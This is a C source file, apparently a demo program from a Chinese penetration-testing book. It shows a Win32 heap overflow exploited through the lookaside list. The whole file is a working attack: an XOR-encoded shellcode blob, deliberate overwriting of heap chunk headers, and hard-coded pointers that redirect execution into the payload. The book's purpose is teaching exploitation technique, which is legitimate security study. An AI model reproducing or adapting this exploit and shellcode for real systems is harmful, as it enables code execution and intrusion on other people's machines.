/* lookaside_test.c
*
*  《网络渗透技术》演示程序
*  作者：san, alert7, eyas, watercloud
*
*  Win32堆溢出lookaside表利用演示
*/

#include <windows.h> 
#include <stdio.h>

char shellcode[]=
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x58\x01\x80\x34\x0b\xf8\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\xda\xf9\xf8\xf8\xa7\x9c\x59\xc8"
"\xf8\xf8\xf8\xa8\x73\xb8\xf4\x73\xb8\xe4\x73\x90\xf0\xa8\x73\x0f"
"\x92\xfa\xa1\x10\x39\xf8\xf8\xf8\x1a\x01\xa0\x73\xf8\x73\x90\xf0"
"\xa0\x07\xce\x77\xb8\xd8\x07\x8e\xfc\x77\xb8\xdc\x92\xfb\xa1\x10"
"\x5d\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f\x8b\xca\xa7"
"\xac\x07\xae\xf0\x73\x10\x92\xfd\xa1\x10\x73\xf8\xf8\xf8\x1a\x01"
"\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae\xec\xa8"
"\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe0\x73\x20\xcb\x38\xa8\xa8"
"\xa8\x73\x04\x9e\x3f\xff\xfa\xf8\x9e\x73\xbe\xd0\x7e\x3c\x9e\x71"
"\xbf\xfa\x92\xe8\xaf\xab\x07\xae\xe4\x92\xf9\xab\x07\xae\xd8\xa8"
"\xa8\xab\x07\xae\xdc\x73\x20\x90\x9b\x95\x9c\xf8\x75\xec\xdc\x7b"
"\x14\xac\x73\x04\x92\xec\xa1\xcb\x38\x71\xfc\x77\x1a\x03\x3e\xbf"
"\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71\xa7\xb0\x71\xa7\xb4\x71\xa7"
"\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9\x92\xf9\xa9\xa9\xaa\xa9\x07"
"\xae\xf4\xcb\x38\xb0\xa8\x07\xae\xe8\xa9\xae\x73\x8d\xc4\x73\x8c"
"\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb\x0d\xcb\x31\xb1\xb9\x55\xfb"
"\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c\xf0\x39\x33\xff\xfb\x22\xb8"
"\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6\xdc\xfb\x25\x9e\x73\xf4\xb3"
"\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb\x3d\x53\xa6\xa1\x3b\x10\x21"
"\x06\x07\x07\x06\xdc\x81\x9c\x22\x06\xf1\x6e\xca\x8c\x69\xf4\x31"
"\x44\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c"
"\xe8\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9\xa4\xe9\x47\x1d";

void main() 
{ 
    HANDLE hHeap; 
    char   *buf1, *buf2;

    hHeap = HeapCreate(2, 64*1024, 0); /* [1] */
    buf1  = HeapAlloc(hHeap, 0, 1024);
    buf2  = HeapAlloc(hHeap, 0, 8);

    memcpy(buf1+1024, "\x01\x00\x01\x00\x01\x10\x08\x01", 8);
    *(unsigned int *)&buf1[1024+8]   = 0x7ffdf250;
    *(unsigned int *)&buf1[1024+8+4] = 0x00390718; /* [2] */

    HeapFree(hHeap, 0, buf1); /* [3] */
    HeapFree(hHeap, 0, buf2);

    buf1  = HeapAlloc(hHeap, 0, 16); /* [4] */
    memset(buf1, 'A', 512);
    memcpy(buf1+4, shellcode, strlen(shellcode));
    HeapFree(hHeap, 0, buf1);

    buf1  = HeapAlloc(hHeap, 0, 64); /* [5] */
    buf2  = HeapAlloc(hHeap, 0, 64);

    memcpy(buf1,    "\x02\x00\x02\x00\x31\x40\x01\x01", 8);
    *(unsigned int *)&buf1[8]   = 0x7ffdf020;
    *(unsigned int *)&buf1[8+4] = 0x7ffdf250;
    memcpy(buf1+32, "\x02\x00\x02\x00\x31\x40\x01\x01", 8);
    *(unsigned int *)&buf1[32+8]   = 0x90909090;
    *(unsigned int *)&buf1[32+8+4] = 0x7ffdf250;
    memcpy(buf1+64, "\x02\x00\x08\x00\x31\x41\x08\x01", 8);

    HeapFree(hHeap, 0, buf2);
    HeapFree(hHeap, 0, buf1);

    HeapDestroy(hHeap);
}